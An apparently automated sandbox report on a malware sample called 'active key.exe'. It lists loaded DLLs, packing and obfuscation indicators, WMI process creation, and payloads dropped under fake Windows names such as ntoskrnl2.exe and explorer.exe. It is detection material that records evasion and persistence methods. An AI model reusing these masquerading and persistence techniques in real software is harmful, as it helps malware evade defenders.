                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                    Source: C:\Program Files\Windows Security\BrowserCore\en-US\explorer.exeSection loaded: mscoree.dll
                    Source: C:\Program Files\Windows Security\BrowserCore\en-US\explorer.exeSection loaded: apphelp.dll
                    Source: C:\Program Files\Windows Security\BrowserCore\en-US\explorer.exeSection loaded: kernel.appcore.dll
                    Source: C:\Program Files\Windows Security\BrowserCore\en-US\explorer.exeSection loaded: version.dll
                    Source: C:\Program Files\Windows Security\BrowserCore\en-US\explorer.exeSection loaded: vcruntime140_clr0400.dll
                    Source: C:\Program Files\Windows Security\BrowserCore\en-US\explorer.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Program Files\Windows Security\BrowserCore\en-US\explorer.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Program Files\Windows Security\BrowserCore\en-US\explorer.exeSection loaded: uxtheme.dll
                    Source: C:\Program Files\Windows Security\BrowserCore\en-US\explorer.exeSection loaded: wldp.dll
                    Source: C:\Program Files\Windows Security\BrowserCore\en-US\explorer.exeSection loaded: amsi.dll
                    Source: C:\Program Files\Windows Security\BrowserCore\en-US\explorer.exeSection loaded: userenv.dll
                    Source: C:\Program Files\Windows Security\BrowserCore\en-US\explorer.exeSection loaded: profapi.dll
                    Source: C:\Program Files\Windows Security\BrowserCore\en-US\explorer.exeSection loaded: windows.storage.dll
                    Source: C:\Program Files\Windows Security\BrowserCore\en-US\explorer.exeSection loaded: cryptsp.dll
                    Source: C:\Program Files\Windows Security\BrowserCore\en-US\explorer.exeSection loaded: rsaenh.dll
                    Source: C:\Program Files\Windows Security\BrowserCore\en-US\explorer.exeSection loaded: cryptbase.dll
                    Source: C:\Program Files\Windows Security\BrowserCore\en-US\explorer.exeSection loaded: sspicli.dll
                    Source: C:\Program Files\Windows Security\BrowserCore\en-US\explorer.exeSection loaded: mscoree.dll
                    Source: C:\Program Files\Windows Security\BrowserCore\en-US\explorer.exeSection loaded: kernel.appcore.dll
                    Source: C:\Program Files\Windows Security\BrowserCore\en-US\explorer.exeSection loaded: version.dll
                    Source: C:\Program Files\Windows Security\BrowserCore\en-US\explorer.exeSection loaded: vcruntime140_clr0400.dll
                    Source: C:\Program Files\Windows Security\BrowserCore\en-US\explorer.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Program Files\Windows Security\BrowserCore\en-US\explorer.exeSection loaded: uxtheme.dll
                    Source: C:\Program Files\Windows Security\BrowserCore\en-US\explorer.exeSection loaded: wldp.dll
                    Source: C:\Program Files\Windows Security\BrowserCore\en-US\explorer.exeSection loaded: amsi.dll
                    Source: C:\Program Files\Windows Security\BrowserCore\en-US\explorer.exeSection loaded: userenv.dll
                    Source: C:\Program Files\Windows Security\BrowserCore\en-US\explorer.exeSection loaded: profapi.dll
                    Source: C:\Program Files\Windows Security\BrowserCore\en-US\explorer.exeSection loaded: windows.storage.dll
                    Source: C:\Program Files\Windows Security\BrowserCore\en-US\explorer.exeSection loaded: cryptsp.dll
                    Source: C:\Program Files\Windows Security\BrowserCore\en-US\explorer.exeSection loaded: rsaenh.dll
                    Source: C:\Program Files\Windows Security\BrowserCore\en-US\explorer.exeSection loaded: cryptbase.dll
                    Source: C:\Program Files\Windows Security\BrowserCore\en-US\explorer.exeSection loaded: sspicli.dll
                    Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dll
                    Source: C:\Windows\System32\cmd.exeSection loaded: apisethost.appexecutionalias.dll
                    Source: C:\Windows\System32\cmd.exeSection loaded: profapi.dll
                    Source: C:\Windows\System32\cmd.exeSection loaded: windows.storage.dll
                    Source: C:\Windows\System32\cmd.exeSection loaded: wldp.dll
                    Source: C:\Windows\System32\ntoskrnl2.exeSection loaded: mscoree.dll
                    Source: C:\Windows\System32\ntoskrnl2.exeSection loaded: kernel.appcore.dll
                    Source: C:\Windows\System32\ntoskrnl2.exeSection loaded: version.dll
                    Source: C:\Windows\System32\ntoskrnl2.exeSection loaded: vcruntime140_clr0400.dll
                    Source: C:\Windows\System32\ntoskrnl2.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Windows\System32\ntoskrnl2.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Windows\System32\ntoskrnl2.exeSection loaded: uxtheme.dll
                    Source: C:\Windows\System32\ntoskrnl2.exeSection loaded: wldp.dll
                    Source: C:\Windows\System32\ntoskrnl2.exeSection loaded: amsi.dll
                    Source: C:\Windows\System32\ntoskrnl2.exeSection loaded: userenv.dll
                    Source: C:\Windows\System32\ntoskrnl2.exeSection loaded: profapi.dll
                    Source: C:\Windows\System32\ntoskrnl2.exeSection loaded: windows.storage.dll
                    Source: C:\Windows\System32\ntoskrnl2.exeSection loaded: cryptsp.dll
                    Source: C:\Windows\System32\ntoskrnl2.exeSection loaded: rsaenh.dll
                    Source: C:\Windows\System32\ntoskrnl2.exeSection loaded: cryptbase.dll
                    Source: C:\Windows\System32\ntoskrnl2.exeSection loaded: sspicli.dll
                    Source: C:\Windows\System32\ntoskrnl2.exeSection loaded: ktmw32.dll
                    Source: C:\Windows\System32\ntoskrnl2.exeSection loaded: rasapi32.dll
                    Source: C:\Windows\System32\ntoskrnl2.exeSection loaded: rasman.dll
                    Source: C:\Windows\System32\ntoskrnl2.exeSection loaded: rtutils.dll
                    Source: C:\Windows\System32\ntoskrnl2.exeSection loaded: mswsock.dll
                    Source: C:\Windows\System32\ntoskrnl2.exeSection loaded: winhttp.dll
                    Source: C:\Windows\System32\ntoskrnl2.exeSection loaded: ondemandconnroutehelper.dll
                    Source: C:\Windows\System32\ntoskrnl2.exeSection loaded: iphlpapi.dll
                    Source: C:\Windows\System32\ntoskrnl2.exeSection loaded: dhcpcsvc6.dll
                    Source: C:\Windows\System32\ntoskrnl2.exeSection loaded: dhcpcsvc.dll
                    Source: C:\Windows\System32\ntoskrnl2.exeSection loaded: dnsapi.dll
                    Source: C:\Windows\System32\ntoskrnl2.exeSection loaded: winnsi.dll
                    Source: C:\Windows\System32\ntoskrnl2.exeSection loaded: rasadhlp.dll
                    Source: C:\Windows\System32\ntoskrnl2.exeSection loaded: fwpuclnt.dll
                    Source: C:\Windows\System32\ntoskrnl2.exeSection loaded: wbemcomn.dll
                    Source: C:\Windows\System32\ntoskrnl2.exeSection loaded: winmm.dll
                    Source: C:\Windows\System32\ntoskrnl2.exeSection loaded: winmmbase.dll
                    Source: C:\Windows\System32\ntoskrnl2.exeSection loaded: mmdevapi.dll
                    Source: C:\Windows\System32\ntoskrnl2.exeSection loaded: devobj.dll
                    Source: C:\Windows\System32\ntoskrnl2.exeSection loaded: ksuser.dll
                    Source: C:\Windows\System32\ntoskrnl2.exeSection loaded: avrt.dll
                    Source: C:\Windows\System32\ntoskrnl2.exeSection loaded: audioses.dll
                    Source: C:\Windows\System32\ntoskrnl2.exeSection loaded: powrprof.dll
                    Source: C:\Windows\System32\ntoskrnl2.exeSection loaded: umpdc.dll
                    Source: C:\Windows\System32\ntoskrnl2.exeSection loaded: msacm32.dll
                    Source: C:\Windows\System32\ntoskrnl2.exeSection loaded: midimap.dll
                    Source: C:\Windows\System32\chcp.comSection loaded: ulib.dll
                    Source: C:\Windows\System32\chcp.comSection loaded: fsutilext.dll
                    Source: C:\Windows\System32\ntoskrnl2.exeSection loaded: mscoree.dll
                    Source: C:\Windows\System32\ntoskrnl2.exeSection loaded: kernel.appcore.dll
                    Source: C:\Windows\System32\ntoskrnl2.exeSection loaded: version.dll
                    Source: C:\Windows\System32\ntoskrnl2.exeSection loaded: vcruntime140_clr0400.dll
                    Source: C:\Windows\System32\ntoskrnl2.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Windows\System32\ntoskrnl2.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Windows\System32\ntoskrnl2.exeSection loaded: uxtheme.dll
                    Source: C:\Windows\System32\ntoskrnl2.exeSection loaded: wldp.dll
                    Source: C:\Windows\System32\ntoskrnl2.exeSection loaded: amsi.dll
                    Source: C:\Windows\System32\ntoskrnl2.exeSection loaded: userenv.dll
                    Source: C:\Windows\System32\ntoskrnl2.exeSection loaded: profapi.dll
                    Source: C:\Windows\System32\ntoskrnl2.exeSection loaded: windows.storage.dll
                    Source: C:\Windows\System32\ntoskrnl2.exeSection loaded: cryptsp.dll
                    Source: C:\Windows\System32\ntoskrnl2.exeSection loaded: rsaenh.dll
                    Source: C:\Windows\System32\ntoskrnl2.exeSection loaded: cryptbase.dll
                    Source: C:\Windows\System32\ntoskrnl2.exeSection loaded: sspicli.dll
                    Source: C:\Windows\en-GB\XUkPLaESKIkbWXdxlvmVntDv.exeSection loaded: mscoree.dll
                    Source: C:\Windows\en-GB\XUkPLaESKIkbWXdxlvmVntDv.exeSection loaded: apphelp.dll
                    Source: C:\Windows\en-GB\XUkPLaESKIkbWXdxlvmVntDv.exeSection loaded: kernel.appcore.dll
                    Source: C:\Windows\en-GB\XUkPLaESKIkbWXdxlvmVntDv.exeSection loaded: version.dll
                    Source: C:\Windows\en-GB\XUkPLaESKIkbWXdxlvmVntDv.exeSection loaded: vcruntime140_clr0400.dll
                    Source: C:\Windows\en-GB\XUkPLaESKIkbWXdxlvmVntDv.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Windows\en-GB\XUkPLaESKIkbWXdxlvmVntDv.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Windows\en-GB\XUkPLaESKIkbWXdxlvmVntDv.exeSection loaded: uxtheme.dll
                    Source: C:\Windows\en-GB\XUkPLaESKIkbWXdxlvmVntDv.exeSection loaded: wldp.dll
                    Source: C:\Windows\en-GB\XUkPLaESKIkbWXdxlvmVntDv.exeSection loaded: amsi.dll
                    Source: C:\Windows\en-GB\XUkPLaESKIkbWXdxlvmVntDv.exeSection loaded: userenv.dll
                    Source: C:\Windows\en-GB\XUkPLaESKIkbWXdxlvmVntDv.exeSection loaded: profapi.dll
                    Source: C:\Windows\en-GB\XUkPLaESKIkbWXdxlvmVntDv.exeSection loaded: windows.storage.dll
                    Source: C:\Windows\en-GB\XUkPLaESKIkbWXdxlvmVntDv.exeSection loaded: cryptsp.dll
                    Source: C:\Windows\en-GB\XUkPLaESKIkbWXdxlvmVntDv.exeSection loaded: rsaenh.dll
                    Source: C:\Windows\en-GB\XUkPLaESKIkbWXdxlvmVntDv.exeSection loaded: cryptbase.dll
                    Source: C:\Windows\en-GB\XUkPLaESKIkbWXdxlvmVntDv.exeSection loaded: sspicli.dll
                    Source: C:\Windows\en-GB\XUkPLaESKIkbWXdxlvmVntDv.exeSection loaded: mscoree.dll
                    Source: C:\Windows\en-GB\XUkPLaESKIkbWXdxlvmVntDv.exeSection loaded: kernel.appcore.dll
                    Source: C:\Windows\en-GB\XUkPLaESKIkbWXdxlvmVntDv.exeSection loaded: version.dll
                    Source: C:\Windows\en-GB\XUkPLaESKIkbWXdxlvmVntDv.exeSection loaded: vcruntime140_clr0400.dll
                    Source: C:\Windows\en-GB\XUkPLaESKIkbWXdxlvmVntDv.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Windows\en-GB\XUkPLaESKIkbWXdxlvmVntDv.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Windows\en-GB\XUkPLaESKIkbWXdxlvmVntDv.exeSection loaded: uxtheme.dll
                    Source: C:\Windows\en-GB\XUkPLaESKIkbWXdxlvmVntDv.exeSection loaded: wldp.dll
                    Source: C:\Windows\en-GB\XUkPLaESKIkbWXdxlvmVntDv.exeSection loaded: amsi.dll
                    Source: C:\Windows\en-GB\XUkPLaESKIkbWXdxlvmVntDv.exeSection loaded: userenv.dll
                    Source: C:\Windows\en-GB\XUkPLaESKIkbWXdxlvmVntDv.exeSection loaded: profapi.dll
                    Source: C:\Windows\en-GB\XUkPLaESKIkbWXdxlvmVntDv.exeSection loaded: windows.storage.dll
                    Source: C:\Windows\en-GB\XUkPLaESKIkbWXdxlvmVntDv.exeSection loaded: cryptsp.dll
                    Source: C:\Windows\en-GB\XUkPLaESKIkbWXdxlvmVntDv.exeSection loaded: rsaenh.dll
                    Source: C:\Windows\en-GB\XUkPLaESKIkbWXdxlvmVntDv.exeSection loaded: cryptbase.dll
                    Source: C:\Windows\en-GB\XUkPLaESKIkbWXdxlvmVntDv.exeSection loaded: sspicli.dll
                    Source: C:\Windows\System32\PING.EXESection loaded: iphlpapi.dll
                    Source: C:\Windows\System32\PING.EXESection loaded: mswsock.dll
                    Source: C:\Windows\System32\PING.EXESection loaded: dnsapi.dll
                    Source: C:\Windows\System32\PING.EXESection loaded: rasadhlp.dll
                    Source: C:\Windows\System32\PING.EXESection loaded: fwpuclnt.dll
                    Source: C:\Windows\System32\PING.EXESection loaded: winnsi.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mpclient.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: version.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: msasn1.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wmitomi.dll
                    Source: C:\Users\user\Desktop\active key.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
                    Source: Window RecorderWindow detected: More than 3 window changes detected
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
                    Source: C:\Windows\System32\ntoskrnl2.exeDirectory created: C:\Program Files\Windows Security\BrowserCore\en-US\explorer.exeJump to behavior
                    Source: C:\Windows\System32\ntoskrnl2.exeDirectory created: C:\Program Files\Windows Security\BrowserCore\en-US\7a0fd90576e088Jump to behavior
                    Source: active key.exeStatic PE information: Image base 0x140000000 > 0x60000000
                    Source: active key.exeStatic file information: File size 4691456 > 1048576
                    Source: active key.exeStatic PE information: Raw size of .vmp1 is bigger than: 0x100000 < 0x45b600
                    Source: active key.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

                    Data Obfuscation

                    barindex
                    .NET source code contains potential unpacker
                    Source: ntoskrnl2.exe.0.dr, _.cs.Net Code: Main System.Reflection.Assembly.Load(byte[])
                    Source: 0.2.active key.exe.7ff6e95fd820.2.raw.unpack, _.cs.Net Code: Main System.Reflection.Assembly.Load(byte[])
                    Source: XUkPLaESKIkbWXdxlvmVntDv.exe.5.dr, _.cs.Net Code: Main System.Reflection.Assembly.Load(byte[])
                    Source: XUkPLaESKIkbWXdxlvmVntDv.exe0.5.dr, _.cs.Net Code: Main System.Reflection.Assembly.Load(byte[])
                    Source: fontdrvhost.exe.5.dr, _.cs.Net Code: Main System.Reflection.Assembly.Load(byte[])
                    Source: explorer.exe.5.dr, _.cs.Net Code: Main System.Reflection.Assembly.Load(byte[])
                    Source: backgroundTaskHost.exe.5.dr, _.cs.Net Code: Main System.Reflection.Assembly.Load(byte[])
                    Source: initial sampleStatic PE information: section where entry point is pointing to: .vmp1
                    Source: active key.exeStatic PE information: section name: .vmp0
                    Source: active key.exeStatic PE information: section name: .vmp1
                    Source: C:\Windows\System32\ntoskrnl2.exeCode function: 5_2_00007FFD342F50C0 push esp; iretd 5_2_00007FFD342F50C3
                    Source: C:\Windows\System32\ntoskrnl2.exeCode function: 5_2_00007FFD342F00BD pushad ; iretd 5_2_00007FFD342F00C1
                    Source: C:\Windows\System32\ntoskrnl2.exeCode function: 5_2_00007FFD342F3BB8 push esp; retf 5_2_00007FFD342F3BB9
                    Source: C:\Windows\System32\ntoskrnl2.exeCode function: 5_2_00007FFD346CD0DB push edi; ret 5_2_00007FFD346CD0DC
                    Source: C:\Windows\System32\ntoskrnl2.exeCode function: 5_2_00007FFD346CD3D0 push 00000054h; ret 5_2_00007FFD346CD3D4
                    Source: C:\Windows\System32\ntoskrnl2.exeCode function: 5_2_00007FFD346CD43D push esp; ret 5_2_00007FFD346CD43E
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 28_2_00007FFD341FD2A5 pushad ; iretd 28_2_00007FFD341FD2A6
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 28_2_00007FFD343E2316 push 8B485F91h; iretd 28_2_00007FFD343E231B
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 29_2_00007FFD341DD2A5 pushad ; iretd 29_2_00007FFD341DD2A6
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 29_2_00007FFD342F00BD pushad ; iretd 29_2_00007FFD342F00C1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 29_2_00007FFD343C2316 push 8B485F93h; iretd 29_2_00007FFD343C231B
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 32_2_00007FFD341DD2A5 pushad ; iretd 32_2_00007FFD341DD2A6
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 32_2_00007FFD342F00BD pushad ; iretd 32_2_00007FFD342F00C1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 32_2_00007FFD342FC2C5 push ebx; iretd 32_2_00007FFD342FC2DA
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 32_2_00007FFD343C2316 push 8B485F93h; iretd 32_2_00007FFD343C231B
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 34_2_00007FFD341ED2A5 pushad ; iretd 34_2_00007FFD341ED2A6
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 34_2_00007FFD3430C2C5 push ebx; iretd 34_2_00007FFD3430C2DA
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 36_2_00007FFD341DD2A5 pushad ; iretd 36_2_00007FFD341DD2A6
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 36_2_00007FFD342F00BD pushad ; iretd 36_2_00007FFD342F00C1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 36_2_00007FFD343C2316 push 8B485F93h; iretd 36_2_00007FFD343C231B
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 36_2_00007FFD343C3580 pushad ; retf 36_2_00007FFD343C3581
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 37_2_00007FFD341DD2A5 pushad ; iretd 37_2_00007FFD341DD2A6
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 37_2_00007FFD342F00BD pushad ; iretd 37_2_00007FFD342F00C1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 37_2_00007FFD343C2316 push 8B485F93h; iretd 37_2_00007FFD343C231B
                    Source: C:\Program Files\Windows Security\BrowserCore\en-US\explorer.exeCode function: 42_2_00007FFD342E50C0 push esp; iretd 42_2_00007FFD342E50C3
                    Source: C:\Program Files\Windows Security\BrowserCore\en-US\explorer.exeCode function: 42_2_00007FFD342E3BB8 push esp; retf 42_2_00007FFD342E3BB9
                    Source: C:\Program Files\Windows Security\BrowserCore\en-US\explorer.exeCode function: 43_2_00007FFD343150C0 push esp; iretd 43_2_00007FFD343150C3
                    Source: C:\Program Files\Windows Security\BrowserCore\en-US\explorer.exeCode function: 43_2_00007FFD34313BB8 push esp; retf 43_2_00007FFD34313BB9
                    Source: C:\Windows\System32\ntoskrnl2.exeCode function: 48_2_00007FFD342F50C0 push esp; iretd 48_2_00007FFD342F50C3
                    Source: C:\Windows\System32\ntoskrnl2.exeCode function: 48_2_00007FFD342F00BD pushad ; iretd 48_2_00007FFD342F00C1
                    Source: C:\Windows\System32\ntoskrnl2.exeCode function: 48_2_00007FFD342F3BB8 push esp; retf 48_2_00007FFD342F3BB9
                    Source: 5.2.ntoskrnl2.exe.1b180000.4.raw.unpack, nJ93tM7rpkcHk5DHEWo.csHigh entropy of concatenated method names: 'KZ3', 'imethod_0', 'vmethod_0', 'XXwHG7MQfps', 'q5AH7HW07p6', 'HAEwT2HgrR0iKI5jLw2B', 'KcN1vGHgu1ln4yZJVNBV', 'JA4ZHaHgd6HqaAKtdjsV', 'GHJugNHgoE38HafrbQHE', 'teddUMHgQ2leu6OG1jP4'

                    Persistence and Installation Behavior

                    barindex
                    Creates processes via WMI
                    Source: C:\Windows\System32\ntoskrnl2.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                    Source: C:\Windows\System32\ntoskrnl2.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                    Source: C:\Windows\System32\ntoskrnl2.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                    Source: C:\Windows\System32\ntoskrnl2.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                    Source: C:\Windows\System32\ntoskrnl2.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                    Source: C:\Windows\System32\ntoskrnl2.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                    Source: C:\Windows\System32\ntoskrnl2.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                    Source: C:\Windows\System32\ntoskrnl2.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                    Source: C:\Windows\System32\ntoskrnl2.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                    Source: C:\Windows\System32\ntoskrnl2.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                    Source: C:\Windows\System32\ntoskrnl2.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                    Source: C:\Windows\System32\ntoskrnl2.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                    Source: C:\Windows\System32\ntoskrnl2.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                    Source: C:\Windows\System32\ntoskrnl2.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                    Source: C:\Windows\System32\ntoskrnl2.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                    Source: C:\Windows\System32\ntoskrnl2.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                    Source: C:\Windows\System32\ntoskrnl2.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                    Source: C:\Windows\System32\ntoskrnl2.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                    Drops PE files with benign system names
                    Source: C:\Windows\System32\ntoskrnl2.exeFile created: C:\Program Files\Windows Security\BrowserCore\en-US\explorer.exeJump to dropped file
                    Drops executables to the windows directory (C:\Windows) and starts them
                    Source: unknownExecutable created and started: C:\Windows\en-GB\XUkPLaESKIkbWXdxlvmVntDv.exe
                    Source: C:\Users\user\Desktop\active key.exeExecutable created and started: C:\Windows\System32\ntoskrnl2.exeJump to behavior
                    Source: C:\Windows\System32\ntoskrnl2.exeFile created: C:\Users\user\Desktop\DnHERPdP.logJump to dropped file
                    Source: C:\Windows\System32\ntoskrnl2.exeFile created: C:\Users\user\Desktop\ZHsakaRB.logJump to dropped file
                    Source: C:\Windows\System32\ntoskrnl2.exeFile created: C:\Windows\en-GB\XUkPLaESKIkbWXdxlvmVntDv.exeJump to dropped file
                    Source: C:\Windows\System32\ntoskrnl2.exeFile created: C:\Users\Public\Pictures\backgroundTaskHost.exeJump to dropped file
                    Source: C:\Windows\System32\ntoskrnl2.exeFile created: C:\Users\user\Desktop\mlzPodne.logJump to dropped file
